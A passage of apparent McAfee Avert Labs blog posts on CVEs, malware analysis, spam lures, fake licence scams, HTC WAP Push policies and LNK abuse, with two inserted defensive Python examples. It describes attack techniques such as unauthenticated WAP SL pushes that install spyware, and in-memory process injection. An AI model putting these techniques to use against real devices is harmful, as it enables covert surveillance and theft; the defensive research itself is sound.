4. PPStream
PPStream is IPTV software based on P2P streaming techniques. It’s very popular in China. Buffer overflows in the PowerPlayer.dll in PPStream before version 2.0.1.3829 allow for the execution of arbitrary code. Its CVE number is CVE-2007-4748.
Reference:
http://www.ppstream.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4748

5. OurGame Chat
OurGame is a free gaming platform that covers all the related fields and areas of network games. It offers nearly one hundred kinds of games, including card games, leisure games, large-scale network games and so on. A buffer overflow in the ConnectAndEnterRoom() method of GLChat.ocx, the OurGame Chat module, allows for the execution of arbitrary code. Its CVE number is CVE-2007-5722.
Reference:
http://www.ourgame.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5722

6. Ultra Star Reader
Ultra Star Reader is an e-book reader tool, similar to a PDF reader. Buffer overflows in Ultra Star Reader allow for the execution of arbitrary code. Its CVE number is CVE-2007-5807.
Reference:
http://www.ssreader.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5807

7. JetAudio
JetAudio is a media player with sound-effect enhancing functionality. Vulnerabilities in the JetFlExt.dll in JetAudio version 7.0.3 allow for the overwriting of arbitrary local files. Attackers can drop malware on a system via this vulnerability. Its CVE number is CVE-2007-4983.
Reference:
http://www.jetaudio.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4983

8. Xunlei Thunder
Xunlei Thunder is free downloader software. It supports multiple download protocols such as HTTP, FTP and BitTorrent. Buffer overflows in the pplayer.dll in Xunlei Thunder allow for the execution of arbitrary code. Its CVE number is CVE-2007-6144.
Reference:
http://www.xunlei.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6144

What you see is NOT what you get

We’ve all read of social engineering tactics before and how gullible users fall prey to many tactics used by virus authors. As researchers we often give recommendations to family and friends on how not to fall prey to such tricks, but once in a while we need to remind ourselves too that we are included in the intended list of targets.

As researchers we deal with different flavors of malware. Over time and with experience, researchers often reach a state of “enlightenment” where you look at a sample and you know whether it’s malicious. At least that’s what we believe; however, there are times where we too are made to think twice. When dealing with malware it’s not uncommon for analysts to come across a note from the authors once in a while. At times they are taunts, and at times they are something more like the example below. We came across a sample which contains messages for security researchers asking them not to add detection for the file, as this is not a virus. Considering that there are legitimate packers that put in warnings for researchers to prevent false detections, such messages can at times make one take a second look.

In the words of a malware author

Besides the fact that they seem to agree that they have authored this program :) , technically they are right: this is not a virus, but a trojan downloader !!  This trojan silently downloads arbitrary files (a porn dialer in this particular case) from a remote site (hxxp://[skipped].com/del/cmb_[random].exe) and executes them. (New detection added to detect both samples is “Generic.acf”.)

A second example was a little more fascinating for us. Researchers often take two approaches to analysis: Static (opening up the file in Hiew or other similar tools) and Dynamic (replicating the malware). In this case we opened the file in Hiew and the first thing that was apparent was that the file had abnormal resources and import data.

Abnormal Resources

Moving past this error, we also noticed that the Entry Point mentioned in the header is 0001A001, and for an Image Base of 00400000 we should be able to get Hiew to go to the EP, which should be at 0041A001. However, it looks like the file ends at 00410DFF, causing Hiew to fail to reach the EP.

Header Information for EP

At this point in our minds we are more or less sure that this file is corrupt and it could be the end of the analysis, but WAIT !!! Though we may be certain the Windows loader will complain if we attempt to execute this sample, it actually runs like a charm. OK, things are getting really fishy, so back to the drawing board we go. We re-open the file in Hiew, and this time we observe the section header in more detail.

Section Table Entries

There are 10 odd-looking sections, which is fine; some of the sections have a Physical Size of 0 and others overlap, which, though suspicious, is fine too. And then we stumble upon the likely culprit. The authors have modified the Physical Size of the first two sections to FF003000 and FF000200 respectively, whereas their Virtual Sizes are 3000 and 1000. Patching the section sizes to 00003000 and 00000200 fixes the EP issue in Hiew, allowing it to get to the correct EP.
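The section-table trick described above is easy to check for mechanically. The following is an added example (not code from the original post or from McAfee): a small PE32 header parser that maps the entry point RVA to a file offset the way a header-trusting tool would, flags SizeOfRawData values that run past the end of the file or overlap the next section, and clamps the raw sizes to what the file can actually hold, which is the same repair the post describes (FF003000 to 00003000, FF000200 to 00000200). The two-section sample image it operates on is constructed inline; its section names, RVAs and entry point are assumptions chosen for the demonstration, not values from the analysed file.

```python
import struct

# Fixed offsets and sizes from the PE32 file format (not assumptions)
PE32_MAGIC = 0x10B
COFF_SIZE = 20
SECTION_SIZE = 40
SECTION_FMT = '<8sIIIIIIHHI'   # Name, VirtualSize, VirtualAddress, SizeOfRawData,
                               # PointerToRawData, reloc/line ptrs+counts, Characteristics


def parse_pe(data):
    """Parse a PE32 image far enough to get the entry point and section table."""
    if data[:2] != b'MZ':
        raise ValueError('missing MZ signature')
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b'PE\0\0':
        raise ValueError('missing PE signature')
    coff = e_lfanew + 4
    num_sections = struct.unpack_from('<H', data, coff + 2)[0]
    size_opt = struct.unpack_from('<H', data, coff + 16)[0]
    opt = coff + COFF_SIZE
    if struct.unpack_from('<H', data, opt)[0] != PE32_MAGIC:
        raise ValueError('not a PE32 optional header')
    entry_rva = struct.unpack_from('<I', data, opt + 16)[0]
    image_base = struct.unpack_from('<I', data, opt + 28)[0]
    sections = []
    for i in range(num_sections):
        off = opt + size_opt + i * SECTION_SIZE
        name, vsize, va, rawsize, rawptr, *_rest = struct.unpack_from(SECTION_FMT, data, off)
        sections.append({'name': name.rstrip(b'\0').decode('ascii', 'replace'),
                         'vsize': vsize, 'va': va, 'rawsize': rawsize,
                         'rawptr': rawptr, 'hdr_off': off})
    return {'entry_rva': entry_rva, 'image_base': image_base, 'sections': sections}


def entry_file_offset(data):
    """Map AddressOfEntryPoint to a file offset, trusting the header like a
    naive tool: the first section whose span (larger of the two sizes) covers
    the RVA wins. Returns None when the offset lands outside the file, which
    is the 'cannot reach EP' failure seen in the post."""
    pe = parse_pe(data)
    rva = pe['entry_rva']
    for s in pe['sections']:
        span = max(s['vsize'], s['rawsize'])
        if s['va'] <= rva < s['va'] + span:
            off = s['rawptr'] + (rva - s['va'])
            return off if off < len(data) else None
    return None


def section_anomalies(data):
    """Report raw sizes that run past EOF and on-disk overlaps between sections."""
    secs = sorted(parse_pe(data)['sections'], key=lambda s: s['rawptr'])
    findings = []
    for s in secs:
        if s['rawsize'] and s['rawptr'] + s['rawsize'] > len(data):
            findings.append(f"{s['name']}: SizeOfRawData {s['rawsize']:08X} runs past EOF {len(data):08X}")
    for a, b in zip(secs, secs[1:]):
        if a['rawsize'] and b['rawsize'] and a['rawptr'] + a['rawsize'] > b['rawptr']:
            findings.append(f"{a['name']} overlaps {b['name']} on disk")
    return findings


def repair_section_sizes(data):
    """Return a copy with each SizeOfRawData clamped to the bytes the file can
    hold: up to the next section's PointerToRawData, or EOF for the last one."""
    patched = bytearray(data)
    secs = sorted(parse_pe(data)['sections'], key=lambda s: s['rawptr'])
    for i, s in enumerate(secs):
        limit = secs[i + 1]['rawptr'] if i + 1 < len(secs) else len(data)
        allowed = max(0, limit - s['rawptr'])
        if s['rawsize'] > allowed:
            struct.pack_into('<I', patched, s['hdr_off'] + 16, allowed)  # SizeOfRawData field
    return bytes(patched)


def build_sample(tampered):
    """Constructed two-section PE32 image (test data, not a real binary).
    With tampered=True the raw sizes carry the FF high byte from the post."""
    image = bytearray(0x3600)
    image[0:2] = b'MZ'
    struct.pack_into('<I', image, 0x3C, 0x80)               # e_lfanew
    image[0x80:0x84] = b'PE\0\0'
    coff = 0x84
    struct.pack_into('<HH', image, coff, 0x14C, 2)          # i386, 2 sections
    struct.pack_into('<H', image, coff + 16, 0xE0)          # SizeOfOptionalHeader
    opt = coff + COFF_SIZE
    struct.pack_into('<H', image, opt, PE32_MAGIC)
    struct.pack_into('<I', image, opt + 16, 0x5010)         # AddressOfEntryPoint (assumed RVA)
    struct.pack_into('<I', image, opt + 28, 0x400000)       # ImageBase
    sect = opt + 0xE0
    text_raw = 0xFF003000 if tampered else 0x3000
    data_raw = 0xFF000200 if tampered else 0x200
    struct.pack_into(SECTION_FMT, image, sect, b'.text', 0x3000, 0x1000, text_raw, 0x400, 0, 0, 0, 0, 0x60000020)
    struct.pack_into(SECTION_FMT, image, sect + SECTION_SIZE, b'.data', 0x1000, 0x5000, data_raw, 0x3400, 0, 0, 0, 0, 0xC0000040)
    return bytes(image)


if __name__ == '__main__':
    bad = build_sample(tampered=True)
    print('tampered EP offset:', entry_file_offset(bad), section_anomalies(bad))
    fixed = repair_section_sizes(bad)
    print('repaired EP offset: %#x' % entry_file_offset(fixed), section_anomalies(fixed))
```

The repair rule is deliberately conservative: it only shrinks a raw size that cannot be backed by file bytes, so a well-formed file passes through unchanged, and sections with a raw size of zero (.bss-style) are left alone.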

Heck, even IDA wasn’t able to load the file; it gave the following error and quit: “Virtual Array: Address space limit reached”

IDA Error

Olly on the other hand mentions the large section size but still loads it comfortably.

Clearly the authors are attempting a kind of social engineering here by crafting the section table. A second opinion is that using this technique might also trick certain AV products into mis-loading such files. We’d like to hear your thoughts too…..

So the moral of the story is, don’t judge a book by its cover or malware based on only one tool, drink more coffee and keep at it. Happy Researching !!  [We currently detect this as Spy-Agent.dp.gen]

McAfee Debuts ‘Combating Threats’ Series

McAfee Avert Labs will now produce more detailed documentation on prevalent threat families. The “Combating Threats” document series is designed to arm security staff within organizations with more information concerning prevalent threat families as well as to provide additional mitigation steps that can be taken. The first two documents in this series, “W32/Virut Family” and “Finding W32/Conficker.worm,” are now available via our blog, prior to our “Combating Threats” web page going live.

UPDATE MARCH 17th

Apologies for the busted links yesterday. All seem to be resolving fine now.

Malware Riding on the Tides of the Economic Crisis

A new spam run is on the loose, misusing the global economic crisis as its social-engineering vector. Consumers looking for a bargain should take care, because the bad guys want to fool exactly those people trying to save some money these days. Spam mails promoting bargains, which could supposedly help in the recession, are hitting inboxes right now.

When users follow a link in such spam mails–but please don’t do that!–a website like the one below appears:

After the Valentine’s Day theme, the malware authors behind the Waledac botnet changed their lure to promote free coupons, pretending to “save” consumers a lot of money. The text states: Exclusive sale coupons and deals at over 100 000 stores in <City>, <Country>. You can find these amazing sale offers and coupons ONLY HERE! You can download free online and printable coupon list. In our list there are most popular stores, restaurants and companies in <City>, <Country> with discounts up to 95%. We help you to survive this crisis! The coupon list is named “couponslist.exe,” “sale.exe,” or “print.exe”–and, in fact, is malware.

In economically hard times, the malware authors do not rely only on clever and timely social engineering, they also include a malicious IFRAME in the website that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection. Furthermore, the website is craftily designed. The bad guys are using geo-location services to better target their audience. So when someone connects to the website, it determines the geographical location on the fly and presents the actual location in the website texts. When a victim sees coupons for exactly his town, this will increase the demand for the bargain list.

As a last piece of advice we can only stress again that consumers should always take care with offers that look too good to be true–even more so in the hard times of a global economic crisis. Please also refer to our predictions for 2009 “Cybercrime, Online Threats, and the Recession.”

MS09-002 Exploit in the wild uses MSWord Lure

An exploit targeting a recently patched vulnerability in Internet Explorer 7 was discovered in the wild. Malware crooks were quick to develop a working exploit for the vulnerability, which was part of the February Microsoft patch release. Microsoft rated this vulnerability critical, with consistent exploit code likely. The modus operandi bears close resemblance to the zero-day attack using Word documents we blogged about in December 2008.

The attack, delivered in the form of a maliciously crafted document, is sent out to unsuspecting users. This Word document contains an embedded ActiveX control which, upon opening, connects to a website hosting the MS09-002 exploit.

Malware authors are always working to create new and improved ways to evade detection and control compromised machines. This time, malware authors introduced obfuscation (base64 encoding) possibly to evade easy analysis and detection.

The ActiveX control facilitates connection to the malicious website to launch and execute the MS09-002 exploit.

For those who have not patched their machines, we suggest you install the MS09-002 patch immediately. It will just be a matter of time before different variants of this exploit start circulating in the wild and become incorporated into various Do-It-Yourself web attack toolkits.

The malicious Word document is detected with the current DATs as Exploit-MSWord.k, and the Internet Explorer 7 exploit is detected as Exploit-XMLhttp.d / Exploit-CVE2009-0075.

Trojan Bundles Legit Social-Network Toolbar with Backdoor

Here’s another twist in regionally targeted attacks: A new Trojan (pretending to be a toolbar installer) is spreading that bundles the legitimate toolbar for the German social network “StudiVZ” with a variant of Backdoor-CEP. Among other malicious activities, the backdoor is capable of recording a user’s screen, taking screenshots, and logging keyboard strokes. At first glance, the deliberately modified installer looks perfectly harmless, especially because it refuses to do anything malicious if it detects certain security products or if it thinks it’s being observed through a sandbox or a debugger.

Behind the curtain, however, a lot of non-kosher things happen. The installer injects parts of the bundled malicious code into running processes or starts a legitimate process in suspended state, and then unmaps its content and remaps different, malicious content to the process before resuming it again. The malicious code is hard to detect because it is decrypted and injected into memory and never written to disk.

Disassembly of the backdoor creating a suspended process

After the toolbar’s installer has finished, it automatically runs an instance of Internet Explorer to open http://studivz.net, which is the social network’s login site. With the newly installed toolbar clearly visible now through additional controls and logos on top, the user’s next step will most probably be to log into the social networking site.

At this point the backdoor has already infected a number of running processes in memory and installed a callback to capture and save any keystrokes.

Part of the backdoor's keylogging code

The author of this variant of Backdoor-CEP seems to be particularly interested in the credentials of StudiVZ; the Trojan also makes periodic connection attempts to a host located in Germany. Fortunately for McAfee customers, the malicious installer is blocked by Artemis and is blocked at the (former Secure Computing) Web Gateway.

New Valentine Scam on the Loose

Following our warning, last week, of the possible scams related to the approaching Valentine’s Day, it’s no surprise that today we’ve seen another new Valentine theme come up–hosted on the fast-fluxing Waledac botnet. If a user were to follow the link in these spam emails–and please don’t do that!–a web site like the following would appear:

A picture of two adorable Shih Tzu puppies wishes you a Happy Valentine’s Day. The text of the lure advertises a “Valentine Devkit” named loveexe.exe or start.exe. Regular readers can guess it already: this is a social-engineering trick to convince users to download the real threat. Don’t click the link to the executable or you will end up with malware.

A close look into the website’s source code doesn’t currently reveal any additional drive-by infections or downloads (but that can change quickly), as seen in past Waledac (or “Storm”) themes. Coverage of this particular malware variant is in the 5522 DATs; it is also blocked by Artemis and at the (former Secure) Web Gateway.

Cybercrime, Online Threats, and the Recession

As the recession continues and unemployment rises, we foresee the top cybercrime trend for 2009 as the continued exploitation of the financial crisis to scam people with fake financial transactions services, bogus investment firms, and fraudulent legal services.

A related trend will be cybercriminals targeting people looking to advance or change their careers through further education. McAfee® Avert® Labs researchers have seen major spikes in diploma and advanced-schooling scams that have coincided with major corporate workforce reductions in the car manufacturing, chemical, and technology industries.

Our Main Threat Predictions/Trends for 2009:

• Threats on Social-Networking Sites. Cybercriminals no longer deliver threats only via spam. They are taking advantage of Facebook, MySpace, and other popular social-networking sites. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional ways of malware distribution such as email.

• Personalized Threats Speak Your Language. McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

• Malware Targets Consumer Devices. McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

• Security Software Scams. The malware underworld is using mainstream practices in an effort to “sell” security software that is either misleading or outright fraudulent. McAfee expects this trend to continue.

• Abusing Free Web-Hosting/Blogging Services. Websites such as Geocities, Blogspot, and Live.com allow anyone to create a public website for free, without the authentication necessary when purchasing a domain-name website. This gives spammers the opportunity to run their underground business with minimal expense. Spam from do-it-yourself social-website-hosting providers arrives at its destination with far greater frequency than links pointing to domain names assigned by legitimate registrars. With little to no threat of punishment for their hosted content, and the new restrictions on short-term domain tasting, the attractiveness of free bandwidth offered by these sites will undoubtedly draw greater focus from malicious parties.

• More Targeted Phishing and Corporate Blackmailing. Botnets, a.k.a. zombie computers, that spread into corporate networks and financial datacenters will increasingly be used to gather sensitive information that can be used for blackmail or sold on the underground market.

• Browser-Based Attacks. Cybercriminals will increasingly attack via web browsers as they are the least-protected and, therefore, easiest way to transfer malware.

• Security Breaches of Confidential Data. Information that is managed by partner and subsidiary companies of bigger companies will be exposed more frequently, forcing an overhaul of data-security practices.

• An Increase in Localized Phishing Campaigns. Online scammers will increasingly target specific communities, especially on college campuses, where professional-looking emails claiming to be associated with the school’s financial or scholarship department will be blasted to all the students at the school. This is a significant danger to people who are just becoming responsible for their own finances.

• More Scams Involving Home Businesses. “Legitimate” home business scams generally involve either a pay-up-front and do-it-yourself kit, or a pay-to-play shell game of training and certification. We’ll see more of it on television, and the same infrastructure that supports diploma spam and confidence fraud will adjust to the new unemployment reality and will offer people some new bait on the old check-cashing scam.

• Increase in Forging and Abuse of Free Email Services. The free email services have started to allow accounts to send mails with arbitrary “from” addresses. This has increased the usability of these services significantly to businesses, but has also increased the “abusability” by spammers.

• McColo: The Effects of a Takedown. Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we expect to see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN.

• New Businesses to Replace Lost McColo Hosting. Hosting companies will be set up in countries that are eager to embrace a burgeoning Internet market and will offer services to replace the disrupted command and control centers formerly hosted by McColo. These may be used as pawns by entities that perceive strategic value in sculpting the battlefield of the future.

In conclusion, McAfee recommends that you keep your security software up to date, implement layered defenses, and educate yourself on the trends of the day. Download our February Spam Report and 2009 Threat Predictions to read further and in more depth on these trends and issues. Remember: The cybercriminals read the same news that we do.

Fake Licenses on the Rise

Since at least the year 2000, email scams have circulated around the net selling International Driver Licenses. The authors explained that with their documents buyers could avoid having to pay traffic tickets, as well as establish new identities for hotel check-ins or bar entrance (if the buyers are underage). Lately these offers have become more elaborate.

Yesterday, I came across such an ad; it was in French and promoted a site offering a replacement driver license in place of a regular one:

Because of its name (backdoordl), the website aroused my curiosity. I followed the link and, one thing leading to another, I discovered the extent of this fraud.

At backdoordl, I found a professional website divided into three areas: French, German and English.

In the UK area, I recognized text that was similar to what I first saw in French:

Have you lost your existing licence? No problem! Can’t remember the details? No problem! Need a clean licence? No problem! Need motorcycle, car, bus, hgv entitlement? No problem! Over 65? No problem! Medical problems? No problem!

There are 110 models of drivers licences in current use throughout the European Union, that’s not to mention drivers licences issued outside of the EU that are still accepted for exchange in different EU countries. This service is directed at any resident or non-resident of the United Kingdom or EU that wishes to obtain a full driving licence without any tests. So no matter what country you are a resident or citizen of, they claim they can help. Even if you live outside of the UK or EU! Once you have a driving licence through them, you can exchange it in your own country for a local licence. EU driving licences are accepted ‘as is’ worldwide for driving and exchange. It does not matter what nationality you are!

The office address, undoubtedly fake, written into the contact page was in the UK. There was no phone number; they said it would be provided only to clients who ordered. Despite some inconsistencies here and there, it was also explained that the company did not accept any postal contact. Because a photo and signature were needed to create the new driving license, they had to be scanned by the buyer and then sent via email.

The registrar was ENOM Inc., and the registration details were protected via the “WhoisGuard” service, thus masking the true identity of the domain-name registrant and preventing public access to that information through its (and any) WHOIS database.

Getting on with my searches, I discovered the backdoordl site was not unique. Almost half a dozen nearly exact copies were also easily available online:

The domain registrants’ WHOIS information is also hidden or filled with seemingly bogus data.

At backdoordl and its clones, prices seem consistent: £359 GBP or 399 Euros with payment encouraged via Western Union. There are two ways to obtain the documents:

First way is to exchange your current driving licence, you complete our application form and we print it out and translate some of your driving licence and translate the application form, put it all together and apply for an EU licence. This is a way to obtain driving categories that you select on the application form as the foreign issuing authority will look at the translation and not the licence.
The second way is to make a declaration that your licence has been lost/mislaid/stolen in a certain country that we know about. No other proof that you have even passed a test is required, just your sworn declaration. They will issue you with a temporary driving licence which we can then get translated and exchanged for an EU licence. SNEAKY? Yes, but Illegal? We have been advised NO.

The announced license process is said to take approximately 21 days.

I also discovered this language localization was not unique. During further searches, I found the AldaLegal offer and its clone, DLtransfer. Here too, these crooks speak your language. The sites are available not only in French, German and English, but also in Spanish and Chinese.

Here, the offer is better rounded and not limited to the European Community:

For both sites, the company address written at the bottom of the contact pages is the same: in Australia (215 Harris St., Sydney NSW 2009). Using Google I got hold of a Word document at the bottom of a directory path: a standard letter perhaps used by the guy behind this rip-off. It would appear they also offer help for illegal immigration.


Finally, two other sites attracted me: eudriverlicence and licencetoday. Here too, the seller expresses himself without restraint:

They clearly explain the two ways to obtain such a license. As before, with the first one the buyer has to provide partial information from his actual license. As a result, the crooks promise an EU Driver License coming from one of the following countries: Cyprus, Czech Republic, Estonia, Hungary, Latvia, Lithuania, Malta, Poland, and Slovenia. The price is around 400 Euros.

With the second way, for applicants who do not or cannot submit any license details (only scanned photo and signature via email), the sites explain they can apply outside the European Union (Africa or a South American country):

All you need to do is check box A “Outside the E.U. Temporary Drivers Licence” on the application form and by ticking the box you declare you have had your licence lost/mislaid/stolen. Then by submitting the application along with further forms, which we submit, we can then obtain a temporary driving licence.

Here a 100 Euro extra-service charge is applied, so the total cost becomes 500 Euros.

These sites are not fully duplicated, but the texts look very similar. One company is Martin and Benn Associates. Its address is said to be in Gibraltar (Victoria House, 26 Main St.). The other is said to be in Germany.

At fraudwatchers, a contributor in Gibraltar went down to the alleged offices of Martin and Benn Associates. He didn’t find them, neither in the building nor in the Gibraltar telephone book. To prove this, he provided the following picture:

The risks are numerous in a story like this. The first: you are not assured of receiving the document. For sure, your bank account will be debited, but getting the license in return is less certain. And fear the worst for the personal data (plus your photo, plus your signature) that you send to these guys. This information would be perfect for making forged papers.

Depending on regional laws, it may or may not be legal for these companies to produce such documents and to sell them to you, but it may well be illegal for you to carry them or to use them as a driving license. The drivers.com website provides the truth:

  • An International Driving Permit is merely a translation of your regular driver’s license into almost a dozen languages.
  • It is not a driver’s license by itself.
  • You must still carry a valid, regular license from your country, even if you are also carrying an IDP.
  • Yes, the United Nations created a treaty, now signed by about 150 countries, but the IDP is not a license by itself. It is mainly to help police read licenses written in other languages.
  • You must purchase an IDP in your country of residence.
  • You must have a legal license from your country of residence in order to get an IDP.
  • No, you cannot use the IDP as a “license” inside your country of residence.
  • No, you do not get a new, separate driving record with an IDP. They cannot be used to hide violations or tickets: These are still recorded on your regular driver’s license.
  • Most countries authorize only certain organizations to sell IDPs. Check with your local government driver’s license authority.
  • In the USA, only two organizations are allowed to sell real, legal IDPs: the American Automobile Association (enter your location carefully), and the American Automobile Touring Alliance, which offers IDPs through the National Automobile Club.
  • In Canada, the only authorized distributor of legal IDPs is the CAA. Canadian IDPs are not valid in the USA.
  • In the USA and Canada, the cost of a real IDP is about $10.

Being French, only one question left for me as I ended this post: Why do all these guys write “licence” with two “c’s”? I found the response in my dictionary: In the UK, “licence” is the noun and “license” is the verb. In American English, however, the noun is also spelled license. Another lead for the police :-).

Counting Malware

Malware continues to increase at a rapid rate. With the DAT-5516 release, scheduled for 4 February, the number of drivers in the DATs will pass 500,000. Half a million is a huge number. I remember my first antivirus program, back in the ’80s, had a count of about 80. I don’t recall the exact number, but it is easy to put into perspective: we now add far more than that every single day.

However, our current count is not an absolute number of detected malware files, which confuses many people. Drivers can be written very specifically, say one driver for one sample, but that is not very effective. Most drivers are written to detect many samples generically: a single driver can detect 50 or even thousands of malware files. Therefore, the number of detected malware files is far higher than the half million reflected in the DATs. For another look at the complexity of counting malware detections, please see François Paget’s blog as well.

Initially VirusScan focused only on true self-replicating viruses, mainly 16-bit MS-DOS (.com/.exe) file viruses and boot-sector viruses, which were prevalent then (and some still are today). Malware has since evolved into many areas including, but not limited to, VBA, VBScript and JavaScript malware, 32-bit (PE-format .exe) mass-mailers, 32-bit file infectors, mobile malware, adware, password stealers and others. Nowadays the majority of malware consists of static (non-replicating) Trojans.

There has also been a big shift among malware authors. The first malware authors were hobbyists, writing to prove it could be done, but today we mainly see malware that goes after the money: password stealers and the like. Malware is often developed in professional environments, much like a business project with a plan.

Although there is malware for operating systems such as Mac OSX and the various Linux/Unix versions, most malware is still targeted at Microsoft Windows and its applications.

Chinese Zombie Count Falls but Still Outnumbers Those in U.S.

China’s use of zombies for spam is down, but the country now leads the United States in McAfee’s February Spam Report, available here for download.

The United States has long been the leading supplier of spam, but with the overall amount of spam decreasing, China is catching up. It is not clear what is happening in China: the vast number of computers that had been turned into zombies are no longer being used to send spam. One certainly has to wonder what they are being used for instead.

Additionally, in Switzerland (home of the .ch domain), we have seen a big increase in spam offering “cheap” software.

Clearly, money and profit are still the driving forces for malware and spam these days.

Default Security Policies For HTC Touch Pro Not So Secure

Recently I bought a new cell phone, the HTC Touch Pro. Great mobile phone: Opera Mobile handles web surfing well, the Sprint EV-DO Rev A network is fast, and it is the most stable smartphone I have had so far. As a security researcher I naturally had to dig deeper into how secure this phone actually is, and I quickly found things that make me wonder whether the mobile handset industry has learned anything from the desktop industry about protecting consumers.

The first thing I did was look at the phone’s default security settings. Windows Mobile keeps the policies in the registry under HKLM\Security\Policies\Policies. The policies are documented at http://msdn.microsoft.com/en-us/library/ms890461.aspx, along with the settings recommended as a security baseline at http://msdn.microsoft.com/en-us/library/ms889564.aspx. The first thing I noticed is that some policy settings on my phone differ by default from the recommended settings. Below is an analysis of two of these changed settings:

SL Message Policy
Recommended Default: 2048 - SECROLE_PPG_TRUSTED
Value on HTC Touch Pro: 0000100c: 2112
Changed Value: (SECROLE_PPG_TRUSTED | SECROLE_USER_UNAUTH)

SI Message Policy
Recommended Default: 3072 - (SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED)
Value on HTC Touch Pro: 0000100d: 3136
Changed Value: (SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED | SECROLE_USER_UNAUTH)

These policy settings govern WAP Push SI (Service Indication) and SL (Service Load) messages. WAP Push was designed to let operators, administrators and others push software updates, or even ringtones, directly to the phone. For some unknown reason the HTC Touch Pro departs from the recommended security policy and adds a flag (SECROLE_USER_UNAUTH) that accepts unauthenticated WAP Pushes from anyone. What does this mean? It means an attacker can send a WAP Push telling the phone to install spyware such as FlexiSpy, which gives them full control of the handset. Once installed, the attacker can obtain your private data, your passwords and call logs, and even eavesdrop through the microphone. Sound familiar? And don’t assume this requires a WAP Push routed through a WAP gateway: a specially crafted SMS has the same effect. A binary SMS can carry a WAP SL Push (SL being the variant that can force a download without any user intervention or prompt) that instructs the handset to fetch a URL, retrieve the spyware and run it on receipt. In that case all the attacker needs is the handset’s phone number to send the binary SMS to.

Further research showed that binary SMS does not seem to work on Sprint’s CDMA network, although it is reported to work on GSM networks such as AT&T’s. This makes me wonder what the default WAP Push security policy is on AT&T’s version of the HTC Touch Pro, the HTC FUZE. In any case, unless you know you absolutely need this flag, set these security policies back to the Microsoft recommended default values of 2048 and 3072 respectively. I use PHM Registry Editor, although any registry editor for Windows Mobile will do.
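As an added example (not part of the original post), here is a small Python audit script that decodes policy bitmasks of the kind shown above and compares them with the recommended baseline. The role bit values are the ones implied by the numbers in the post (2112 - 2048 = 64 for SECROLE_USER_UNAUTH, 2048 for SECROLE_PPG_TRUSTED, 3072 - 2048 = 1024 for SECROLE_PPG_AUTH); the input format mimics the “0000100c: 2112” lines above rather than a real registry export, and the sample dump is constructed from the values reported for the HTC Touch Pro.

```python
import re

# Security role bits as implied by the two policy values quoted in the post:
# 2112 - 2048 = 64 and 3136 - 3072 = 64 is SECROLE_USER_UNAUTH, 2048 is
# SECROLE_PPG_TRUSTED and 3072 - 2048 = 1024 is SECROLE_PPG_AUTH.
SECROLE_USER_UNAUTH = 0x0040
SECROLE_PPG_AUTH    = 0x0400
SECROLE_PPG_TRUSTED = 0x0800
ROLE_NAMES = {
    SECROLE_USER_UNAUTH: "SECROLE_USER_UNAUTH",
    SECROLE_PPG_AUTH:    "SECROLE_PPG_AUTH",
    SECROLE_PPG_TRUSTED: "SECROLE_PPG_TRUSTED",
}

# Policy IDs (the registry value names 0000100c and 0000100d) with the
# Microsoft recommended baseline values given in the post.
BASELINE = {
    0x100C: ("SL Message Policy", SECROLE_PPG_TRUSTED),
    0x100D: ("SI Message Policy", SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED),
}


def decode_roles(value):
    """Split a policy bitmask into role names; bits we have no name for are kept as hex."""
    names = [name for bit, name in sorted(ROLE_NAMES.items()) if value & bit]
    unknown = value & ~sum(ROLE_NAMES)
    if unknown:
        names.append("0x%04x" % unknown)
    return names


def parse_dump(text):
    """Parse 'xxxxxxxx: value' lines (the format used in the post) into {policy_id: value}."""
    policies = {}
    for m in re.finditer(r"^\s*([0-9a-fA-F]{8}):\s*(\d+)\s*$", text, re.M):
        policies[int(m.group(1), 16)] = int(m.group(2))
    return policies


def audit(policies):
    """Compare each known policy with the baseline; one finding per deviating policy."""
    findings = []
    for pid, (name, recommended) in BASELINE.items():
        if pid not in policies:
            continue
        current = policies[pid]
        if current != recommended:
            findings.append({
                "policy": name, "id": pid,
                "current": current, "recommended": recommended,
                "extra_roles": decode_roles(current & ~recommended),
                "missing_roles": decode_roles(recommended & ~current),
            })
    return findings


# Constructed input, copied from the values the post reports for the HTC Touch Pro.
SAMPLE_DUMP = """
0000100c: 2112
0000100d: 3136
"""

if __name__ == "__main__":
    for f in audit(parse_dump(SAMPLE_DUMP)):
        print("%s (0x%04x): %d, recommended %d, extra roles: %s" % (
            f["policy"], f["id"], f["current"], f["recommended"], ", ".join(f["extra_roles"])))
```

Run it on a text dump of HKLM\Security\Policies\Policies taken from the device; any bit the script cannot name is reported in hex, so an undocumented role does not get silently accepted as harmless.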

Abusing Shortcut files

Shortcuts, or LNK files, are small binary files that hold the path to an application, sometimes with optional parameters. They are used to launch applications and are placed where users can reach them easily, such as the Desktop or application launchers. LNK files placed in the Startup folder run automatically at system boot. This indirect way of running applications is attractive to malware authors because shortcuts have never drawn users’ security attention the way executable files have. At Avert Labs we have recently seen malware abusing shortcut files to launch malicious files or scripts in several different ways. Here are some of the methods we have seen:

  1. Shortcut files linking to malware files
     This is an easy way to launch malware through a user’s action or upon system reboot. The LNK files are created on the desktop, on network shares and even in Startup folders. Several variants of the Spy-Agent.bw trojan are known to use shortcuts this way.

  2. Parasitic infection of shortcuts
     We have seen the W32/Mokaksu virus modify every LNK file on the desktop, prepending the path of the malware file to the original path.

